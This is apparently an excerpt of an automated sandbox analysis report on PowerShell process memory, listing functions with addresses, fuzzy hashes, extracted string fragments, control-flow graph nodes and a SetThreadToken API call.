                                • Opcode Fuzzy Hash: 3f155b785471cff0b810b490485b32db5de2d58357f0341988ee732111adcc1c
                                • Instruction Fuzzy Hash: AAE127307402108FDB289B7D881463E76DB9FC9B24B2544BAD906EF3A5EE74EC01C7A1
                                Function 04E77A09 Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 1bb82c5aa4b80acb944289e11960ee6fc7c5ac8194967bc59de719d74728599d
                                • Instruction ID: 930e005fbc92027e19f9dceadcc5296cc43448f4d00c0d4d8d4a5e9097752533
                                • Opcode Fuzzy Hash: 1bb82c5aa4b80acb944289e11960ee6fc7c5ac8194967bc59de719d74728599d
                                • Instruction Fuzzy Hash: 00B1C374E002199FDB54DFA9D980A9DFBF6FF88304F20862AD419AB354DB34A905CF90
                                Function 04E77A18 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 1af1d97aa911b9eeffe40135397912aeeff44de2dec59f50f546866ca24b9f61
                                • Instruction ID: 4c8908db8cc03ac255a3342e6e9bbb75b8010b1c66c21ab7d6150ced716c6277
                                • Opcode Fuzzy Hash: 1af1d97aa911b9eeffe40135397912aeeff44de2dec59f50f546866ca24b9f61
                                • Instruction Fuzzy Hash: A1B1B474E002199FDB54DFA9D980A9DFBF6FF88304F20862AD419AB354DB34A905CF90
                                Function 04E771F8 Relevance: 5.2, Strings: 4, Instructions: 184COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2177999075.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_4e70000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: `^q$`^q$`^q$`^q
                                • API String ID: 0-4294711580
                                • Opcode ID: 34cdc7cc46a6ef9f5704a5b4e253c781884f170ed460b63b0738df811738efbf
                                • Instruction ID: 1ccdac693b554b7edfbc86d6c6a30373300df0de1b4b7942d9f75ea26cd71a8f
                                • Opcode Fuzzy Hash: 34cdc7cc46a6ef9f5704a5b4e253c781884f170ed460b63b0738df811738efbf
                                • Instruction Fuzzy Hash: 57818074E012199FDB54CFA9D990A9DFBF2FF48314F20862AD819AB314E734A905CF90
                                Function 07BC5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q$$]q
                                • API String ID: 0-858218434
                                • Opcode ID: e76a60d067c69d0af6d9efd06dc235d1afbf8c0554443c24612bc5e0fad57de7
                                • Instruction ID: 99c35b5d88c0171c2499c0d519b09d2786b728f9b1ee591f169e9c3f06af2b8c
                                • Opcode Fuzzy Hash: e76a60d067c69d0af6d9efd06dc235d1afbf8c0554443c24612bc5e0fad57de7
                                • Instruction Fuzzy Hash: C2213AF13102059BFB34962A49457277BDADFD0711F34C86EA945CB281DD75E450C361
                                Function 07BC0308 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2204498454.0000000007BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BC0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_7bc0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$$]q$$]q
                                • API String ID: 0-978391646
                                • Opcode ID: b30b3f38450842a14590680922808fa4f6d13b78af4cc39e0ba5ecf9e94ca6ae
                                • Instruction ID: 5ce109f056ee7e8fb46548f45feb5ea15b5fb004fbbf7e1af0cbb51375d79667
                                • Opcode Fuzzy Hash: b30b3f38450842a14590680922808fa4f6d13b78af4cc39e0ba5ecf9e94ca6ae
                                • Instruction Fuzzy Hash: 2101F2A170D7828FD73B222C19201696FB69FC2A10B2A85DBC481DF297C9284C0987A7

                                Execution Graph

                                Execution Coverage:5.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 23033 8496580 23034 84965c3 SetThreadToken 23033->23034 23035 84965f1 23034->23035

                                Executed Functions

                                Function 02B3B490 Relevance: .3, Instructions: 260COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 889 2b3b490-2b3b4b9 890 2b3b4bb 889->890 891 2b3b4be-2b3b7f9 call 2b3aab4 889->891 890->891 952 2b3b7fe-2b3b805 891->952
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 75065d9abeca782f68c1533fd28bd5516556f57a2991a0b8b0e266864d86cac6
                                • Instruction ID: cdc15ba13dadb345d2f3f23b1524551bfae8af3cb187d0be05ebf225e53a2b30
                                • Opcode Fuzzy Hash: 75065d9abeca782f68c1533fd28bd5516556f57a2991a0b8b0e266864d86cac6
                                • Instruction Fuzzy Hash: F0918E71A006159BDB19EFB485106AFBBE3EFC4704B14C929D15AAB380DF34AD068FD6
                                Function 02B3B4A0 Relevance: .3, Instructions: 252COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 953 2b3b4a0-2b3b4b9 954 2b3b4bb 953->954 955 2b3b4be-2b3b7f9 call 2b3aab4 953->955 954->955 1016 2b3b7fe-2b3b805 955->1016
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c85d216a916500ba675974ab53acb4dd2fc2ca232407fe3332b2487d1398d62
                                • Instruction ID: 2d4c9c9fcd3892ae66b28912fb53432da586f2eb6ac4204c49668a73cd836e46
                                • Opcode Fuzzy Hash: 5c85d216a916500ba675974ab53acb4dd2fc2ca232407fe3332b2487d1398d62
                                • Instruction Fuzzy Hash: 80918D71E006199BDB19EFB485106AFB6E3EFC4704B14C92DD15AAB380DF34A9068BD6
                                Function 07322308 Relevance: 19.4, Strings: 15, Instructions: 652COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$pij$pij$pij$pij$pij$J'l$J'l$J'l$J'l$J'l$J'l$r&l$r&l
                                • API String ID: 0-2161624822
                                • Opcode ID: 53b0c5a4f5452b1cef9a08729e370719a1afcf7763cfdafca26318da37b0bd29
                                • Instruction ID: 5323ee462ba77357ede814ab409b443a3222d7f0b316656fd5598111ff43ce02
                                • Opcode Fuzzy Hash: 53b0c5a4f5452b1cef9a08729e370719a1afcf7763cfdafca26318da37b0bd29
                                • Instruction Fuzzy Hash: C3228DB1B042298FEB159F688C506ABBBE6FF85310F15807AD908CB251CB35DD46D7B2
                                Function 07323CE8 Relevance: 5.6, Strings: 4, Instructions: 578COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 203 7323ce8-7323d0d 204 7323d13-7323d18 203->204 205 7323f00-7323f4a 203->205 206 7323d30-7323d34 204->206 207 7323d1a-7323d20 204->207 213 7323f50-7323f55 205->213 214 73240ce-73240e4 205->214 211 7323eb0-7323eba 206->211 212 7323d3a-7323d3c 206->212 209 7323d22 207->209 210 7323d24-7323d2e 207->210 209->206 210->206 215 7323ec8-7323ece 211->215 216 7323ebc-7323ec5 211->216 217 7323d3e-7323d4a 212->217 218 7323d4c 212->218 219 7323f57-7323f5d 213->219 220 7323f6d-7323f71 213->220 232 73240e6-7324112 214->232 233 732415f-7324165 214->233 221 7323ed0-7323ed2 215->221 222 7323ed4-7323ee0 215->222 224 7323d4e-7323d50 217->224 218->224 225 7323f61-7323f6b 219->225 226 7323f5f 219->226 229 7324080-732408a 220->229 230 7323f77-7323f79 220->230 228 7323ee2-7323efd 221->228 222->228 224->211 231 7323d56-7323d75 224->231 225->220 226->220 235 7324097-732409d 229->235 236 732408c-7324094 229->236 237 7323f7b-7323f87 230->237 238 7323f89 230->238 269 7323d77-7323d83 231->269 270 7323d85 231->270 242 7324228-732425d 232->242 243 7324118-732411d 232->243 239 7324167 233->239 240 7324169-7324175 233->240 245 73240a3-73240af 235->245 246 732409f-73240a1 235->246 244 7323f8b-7323f8d 237->244 238->244 249 7324177-732417e 239->249 240->249 267 732428b-7324295 242->267 268 732425f-7324281 242->268 250 7324135-7324139 243->250 251 732411f-7324125 243->251 244->229 252 7323f93-7323fb2 244->252 253 73240b1-73240cb 245->253 246->253 255 7324180-7324186 249->255 256 7324196-73241d7 249->256 261 73241da-73241e4 250->261 262 732413f-7324141 250->262 257 7324127 251->257 258 7324129-7324133 251->258 296 7323fc2 252->296 297 7323fb4-7323fc0 252->297 271 732418a-7324194 255->271 272 7324188 255->272 257->250 258->250 276 73241f1-73241f7 261->276 277 73241e6-73241ee 261->277 265 7324143-732414f 262->265 266 7324151 262->266 278 7324153-7324155 265->278 266->278 280 7324297-732429c 267->280 281 732429f-73242a5 267->281 305 7324283-7324288 268->305 306 73242d5-73242fe 268->306 279 7323d87-7323d89 269->279 270->279 271->256 272->256 282 73241f9-73241fb 276->282 283 73241fd-7324209 276->283 278->261 286 732415b-732415d 278->286 279->211 287 7323d8f-7323d96 279->287 288 73242a7-73242a9 281->288 289 73242ab-73242b7 281->289 293 732420b-7324225 282->293 283->293 286->233 286->249 287->205 294 7323d9c-7323da1 287->294 295 73242b9-73242d2 288->295 289->295 300 7323da3-7323da9 294->300 301 7323db9-7323dc8 294->301 303 7323fc4-7323fc6 296->303 297->303 307 7323dab 300->307 308 7323dad-7323db7 300->308 301->211 314 7323dce-7323dec 301->314 303->229 310 7323fcc-7324003 303->310 321 7324300-7324326 306->321 322 732432d-732435c 306->322 307->301 308->301 327 7324005-732400b 310->327 328 732401d-7324024 310->328 314->211 325 7323df2-7323e17 314->325 321->322 340 7324395-732439f 322->340 341 732435e-732437b 322->341 325->211 349 7323e1d-7323e24 325->349 332 732400f-732401b 327->332 333 732400d 327->333 330 7324026-732402c 328->330 331 732403c-732407d 328->331 335 7324030-732403a 330->335 336 732402e 330->336 332->328 333->328 335->331 336->331 345 73243a1-73243a5 340->345 346 73243a8-73243ae 340->346 354 73243e5-73243ea 341->354 355 732437d-732438f 341->355 347 73243b0-73243b2 346->347 348 73243b4-73243c0 346->348 351 73243c2-73243e2 347->351 348->351 352 7323e26-7323e41 349->352 353 7323e6a-7323e9d 349->353 361 7323e43-7323e49 352->361 362 7323e5b-7323e5f 352->362 368 7323ea4-7323ead 353->368 354->355 355->340 365 7323e4b 361->365 366 7323e4d-7323e59 361->366 367 7323e66-7323e68 362->367 365->362 366->362 367->368
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q$4']q$4']q
                                • API String ID: 0-1785108022
                                • Opcode ID: b7b42bc7b00f5f8d0a25fc2565c1b1b23bb05f5f7e215e395998ce6590750d69
                                • Instruction ID: fde0ac576cc92fbaedf2b3e5b3c5bd2a8dd02dd405ccf76f58e65bd0bd88ab9e
                                • Opcode Fuzzy Hash: b7b42bc7b00f5f8d0a25fc2565c1b1b23bb05f5f7e215e395998ce6590750d69
                                • Instruction Fuzzy Hash: C012BAB2B043A59FDB158B38981076BFBA6AFC1310F14C47AD949CB291DB35CC86D7A1
                                Function 08496550 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 374 8496550-84965bb 375 84965c3-84965ef SetThreadToken 374->375 376 84965f8-8496615 375->376 377 84965f1-84965f7 375->377 377->376
                                APIs
                                Memory Dump Source
                                • Source File: 00000014.00000002.2275507614.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_8490000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: 179736341c8882f407af0fa8c0fd75082b816fb261d0316e63f46643a2269412
                                • Instruction ID: 4b6c1211998c48a0633a7a7515f4d7cc661cd7d7f5ec8d96cda3e927f46dec00
                                • Opcode Fuzzy Hash: 179736341c8882f407af0fa8c0fd75082b816fb261d0316e63f46643a2269412
                                • Instruction Fuzzy Hash: 85218B71D042898FCB10DF99D444B9EFFF4AF89320F24405AC059A7251C2789945CFA1
                                Function 08496580 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 380 8496580-84965ef SetThreadToken 382 84965f8-8496615 380->382 383 84965f1-84965f7 380->383 383->382
                                APIs
                                Memory Dump Source
                                • Source File: 00000014.00000002.2275507614.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_8490000_powershell.jbxd
                                Similarity
                                • API ID: ThreadToken
                                • String ID:
                                • API String ID: 3254676861-0
                                • Opcode ID: ea881b2244588fffa966756d034f7502a5e44cea76a1080cbfaa18974d240f07
                                • Instruction ID: 1de0f9e2bce985fbcdba42eb99f8878aa262dcd25cb7521350d3906c4df86e21
                                • Opcode Fuzzy Hash: ea881b2244588fffa966756d034f7502a5e44cea76a1080cbfaa18974d240f07
                                • Instruction Fuzzy Hash: 1A1133B59002488FCB20DF9AD984B9EFFF8EF48320F24841AD419A3310C778A944CFA1
                                Function 02B36FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 386 2b36fe0-2b36fff 387 2b37105-2b37143 386->387 388 2b37005-2b37008 386->388 415 2b3700a call 2b37697 388->415 416 2b3700a call 2b3767c 388->416 389 2b37010-2b37022 391 2b37024 389->391 392 2b3702e-2b37043 389->392 391->392 398 2b37049-2b37059 392->398 399 2b370ce-2b370e7 392->399 401 2b37065-2b37073 call 2b3bf20 398->401 402 2b3705b 398->402 403 2b370f2 399->403 404 2b370e9 399->404 407 2b37079-2b3707d 401->407 402->401 403->387 404->403 408 2b3707f-2b3708f 407->408 409 2b370bd-2b370c8 407->409 410 2b37091-2b370a9 408->410 411 2b370ab-2b370b5 408->411 409->398 409->399 410->409 411->409 415->389 416->389
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq
                                • API String ID: 0-600464949
                                • Opcode ID: b2321994479ce37e367f14217d5b5464b3ddd7d9e2fc8badce1e0af467aad62f
                                • Instruction ID: 5d36326500a9f3e1fb5e59d9fbb60c1f8f2fddfbededcdca476b3d454d82d4a9
                                • Opcode Fuzzy Hash: b2321994479ce37e367f14217d5b5464b3ddd7d9e2fc8badce1e0af467aad62f
                                • Instruction Fuzzy Hash: C0415934B042058FDB15DB68C568AAEBBF2EF8D315F1440A9E406AB395CF31ED02DB60
                                Function 02B3AFA8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 417 2b3afa8-2b3afb1 call 2b3a79c 419 2b3afb6-2b3afba 417->419 420 2b3afca-2b3b065 419->420 421 2b3afbc-2b3afc9 419->421 427 2b3b067-2b3b06d 420->427 428 2b3b06e-2b3b08b 420->428 427->428
                                Strings
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (&]q
                                • API String ID: 0-1343553580
                                • Opcode ID: fdfae38bbb8c5793ba9b4561959baea65033888ea8373e2993ce109eaaa1e86d
                                • Instruction ID: 6e7e08bb9530a175af1ec9a450b7eb1f961140b3c30591e039cac943f5c72788
                                • Opcode Fuzzy Hash: fdfae38bbb8c5793ba9b4561959baea65033888ea8373e2993ce109eaaa1e86d
                                • Instruction Fuzzy Hash: 4621DE76A042588FCB14DBAED4407AEBBF6EB89320F24846AD008E7340CA3499058BA5
                                Function 073217B8 Relevance: .3, Instructions: 336COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 791 73217b8-73217da 792 73217e0-73217e5 791->792 793 7321969-73219b5 791->793 794 73217e7-73217ed 792->794 795 73217fd-7321801 792->795 801 7321b04-7321b1c 793->801 802 73219bb-73219c0 793->802 797 73217f1-73217fb 794->797 798 73217ef 794->798 799 7321807-732180b 795->799 800 7321914-732191e 795->800 797->795 798->795 805 732184b 799->805 806 732180d-732181e 799->806 803 7321920-7321929 800->803 804 732192c-7321932 800->804 823 7321b1e-7321b25 801->823 807 73219c2-73219c8 802->807 808 73219d8-73219dc 802->808 811 7321934-7321936 804->811 812 7321938-7321944 804->812 809 732184d-732184f 805->809 806->793 828 7321824-7321829 806->828 813 73219ca 807->813 814 73219cc-73219d6 807->814 818 73219e2-73219e4 808->818 819 7321ab4-7321abe 808->819 809->800 815 7321855-7321859 809->815 816 7321946-7321966 811->816 812->816 813->808 814->808 815->800 821 732185f-7321863 815->821 824 73219e6-73219f2 818->824 825 73219f4 818->825 826 7321ac0-7321ac9 819->826 827 7321acc-7321ad2 819->827 829 7321886 821->829 830 7321865-732186e 821->830 823->823 832 7321b27-7321b34 823->832 833 73219f6-73219f8 824->833 825->833 837 7321ad4-7321ad6 827->837 838 7321ad8-7321ae4 827->838 835 7321841-7321849 828->835 836 732182b-7321831 828->836 843 7321889-7321911 829->843 839 7321870-7321873 830->839 840 7321875-7321882 830->840 841 7321b36-7321b42 832->841 842 7321b44 832->842 833->819 844 73219fe-7321a16 833->844 835->809 845 7321833 836->845 846 7321835-732183f 836->846 847 7321ae6-7321b01 837->847 838->847 849 7321884 839->849 840->849 850 7321b46-7321b48 841->850 842->850 859 7321a30-7321a34 844->859 860 7321a18-7321a1e 844->860 845->835 846->835 849->843 855 7321b4a-7321b50 850->855 856 7321b7c-7321b86 850->856 863 7321b52-7321b54 855->863 864 7321b5e-7321b79 855->864 861 7321b90-7321b96 856->861 862 7321b88-7321b8d 856->862 873 7321a3a-7321a41 859->873 866 7321a22-7321a2e 860->866 867 7321a20 860->867 869 7321b98-7321b9a 861->869 870 7321b9c-7321ba8 861->870 863->864 866->859 867->859 874 7321baa-7321bc1 869->874 870->874 876 7321a43-7321a46 873->876 877 7321a48-7321aa5 873->877 879 7321aaa-7321ab1 876->879 877->879
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3c4109efd351da34deb7b509914fdb099946c764e1c1905746eb5665ee22f2e3
                                • Instruction ID: 1b0bee330a1df04ee5e71bde44bde1a3cee00f2f3a0d53e332aab025b07015e1
                                • Opcode Fuzzy Hash: 3c4109efd351da34deb7b509914fdb099946c764e1c1905746eb5665ee22f2e3
                                • Instruction Fuzzy Hash: ADB178B1B0426D9FDB159B6CC6407AABBE6EFC6310F24C47AD809CB251DB31D842C7A1
                                Function 02B329F0 Relevance: .2, Instructions: 208COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1017 2b329f0-2b32a1e 1018 2b32af5-2b32b37 1017->1018 1019 2b32a24-2b32a3a 1017->1019 1023 2b32c51-2b32c61 1018->1023 1024 2b32b3d-2b32b56 1018->1024 1020 2b32a3f-2b32a52 1019->1020 1021 2b32a3c 1019->1021 1020->1018 1027 2b32a58-2b32a65 1020->1027 1021->1020 1029 2b32b5b-2b32b69 1024->1029 1030 2b32b58 1024->1030 1031 2b32a67 1027->1031 1032 2b32a6a-2b32a7c 1027->1032 1029->1023 1036 2b32b6f-2b32b79 1029->1036 1030->1029 1031->1032 1032->1018 1035 2b32a7e-2b32a88 1032->1035 1037 2b32a96-2b32aa6 1035->1037 1038 2b32a8a-2b32a8c 1035->1038 1039 2b32b87-2b32b94 1036->1039 1040 2b32b7b-2b32b7d 1036->1040 1037->1018 1041 2b32aa8-2b32ab2 1037->1041 1038->1037 1039->1023 1042 2b32b9a-2b32baa 1039->1042 1040->1039 1043 2b32ac0-2b32af4 1041->1043 1044 2b32ab4-2b32ab6 1041->1044 1045 2b32baf-2b32bbd 1042->1045 1046 2b32bac 1042->1046 1044->1043 1045->1023 1049 2b32bc3-2b32bd3 1045->1049 1046->1045 1050 2b32bd5 1049->1050 1051 2b32bd8-2b32be5 1049->1051 1050->1051 1051->1023 1054 2b32be7-2b32bf7 1051->1054 1055 2b32bf9 1054->1055 1056 2b32bfc-2b32c08 1054->1056 1055->1056 1056->1023 1058 2b32c0a-2b32c24 1056->1058 1059 2b32c26 1058->1059 1060 2b32c29 1058->1060 1059->1060 1061 2b32c2e-2b32c38 1060->1061 1062 2b32c3d-2b32c50 1061->1062
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06da7b8f125907ed90901346d663534ba5f66a7a0638fb4f0d94be134aff8d9b
                                • Instruction ID: 16e96534700274c7c2ff464db03114a5be5bcbd5786f5030f1d2ff6c9859d388
                                • Opcode Fuzzy Hash: 06da7b8f125907ed90901346d663534ba5f66a7a0638fb4f0d94be134aff8d9b
                                • Instruction Fuzzy Hash: 21917A74A002099FCB16CF59C594AAEFBB1FF48310B248699D815AB365C735FC91CBA0
                                Function 02B3BAC0 Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bd4a6c9cf1f2c26634cf720498ea6865b40a97bb5b48407d4e99a54bc01692f4
                                • Instruction ID: 19f24fe1d29115ded0d86c53660f26071f49d361c52a7666fcd8d875fbace134
                                • Opcode Fuzzy Hash: bd4a6c9cf1f2c26634cf720498ea6865b40a97bb5b48407d4e99a54bc01692f4
                                • Instruction Fuzzy Hash: 3A611571E002489FCB15DFA9D584B9DFBF2EF88314F14806AE819AB364DB349845CBA0
                                Function 02B3BAD0 Relevance: .2, Instructions: 155COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3bdd6f1b036787fdb23c10777728988077a81df13647b93264c952d1f61e5075
                                • Instruction ID: 55917073fa9f1a25a2b74586f2b9ac3e9bac57f48a87ac19457d1eb7a9230160
                                • Opcode Fuzzy Hash: 3bdd6f1b036787fdb23c10777728988077a81df13647b93264c952d1f61e5075
                                • Instruction Fuzzy Hash: 0B61F671E00248DFDB15DFA9D584A9DBBF6EF88314F14816AE809AB364EB349845CB50
                                Function 02B37740 Relevance: .2, Instructions: 154COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7c0d83c597fb21615fcf5379667d5529f1c807b13dee96c8ca9c4fd9847a398
                                • Instruction ID: de0f5c5ce3e7557edf5f1f1a1df8ac665cf07e69bd4144c6441492095a095545
                                • Opcode Fuzzy Hash: d7c0d83c597fb21615fcf5379667d5529f1c807b13dee96c8ca9c4fd9847a398
                                • Instruction Fuzzy Hash: 6851BFB53002059FDB15DB6AD944A3ABBEAFFC8315B1484A9E409CB351DF35EC02DBA0
                                Function 07323CDD Relevance: .1, Instructions: 114COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2271288007.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_7320000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9f1a9665275fd7f6fd055cd15d0b094f70973a53a7e84f3d84a85a4a70e1bc7a
                                • Instruction ID: c75cd9dc671e5cbf1d437960e7a5f12540557b6774ee35f09da443e85249278f
                                • Opcode Fuzzy Hash: 9f1a9665275fd7f6fd055cd15d0b094f70973a53a7e84f3d84a85a4a70e1bc7a
                                • Instruction Fuzzy Hash: FF3119F2A00222EBEB248F29C54167AB7B7AF80740F148465DD089F655D739DC8AD7B1
                                Function 02B32B00 Relevance: .1, Instructions: 110COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6032a08e4a220a4522124f54cd6d073d05a3e7f2d0ffc04e06df62c1c6aedf57
                                • Instruction ID: 6c9d9e9821f42f85c227eed8485ccc3b4befbc34e72da6fedff7a0be412d7405
                                • Opcode Fuzzy Hash: 6032a08e4a220a4522124f54cd6d073d05a3e7f2d0ffc04e06df62c1c6aedf57
                                • Instruction Fuzzy Hash: BF412674A005059FCB0ACF59C5D8AEAFBB1FF48314B258599D815AB364C732FC91CBA0
                                Function 02B3C398 Relevance: .1, Instructions: 101COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a90dc088c011319963d39fd5416255a29e2eb8fcff4ab26a45c43ae360b61045
                                • Instruction ID: c5fcc711f3da21e11a23b06c994f574ff113f4cbf73239a2b32e8bc3034e9aca
                                • Opcode Fuzzy Hash: a90dc088c011319963d39fd5416255a29e2eb8fcff4ab26a45c43ae360b61045
                                • Instruction Fuzzy Hash: 62315C31300605AFD709EB78E894A9ABB9BEFC4310F048679D509CB364DF75E809CBA1
                                Function 02B3AE70 Relevance: .1, Instructions: 93COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000014.00000002.2237784039.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_20_2_2b30000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
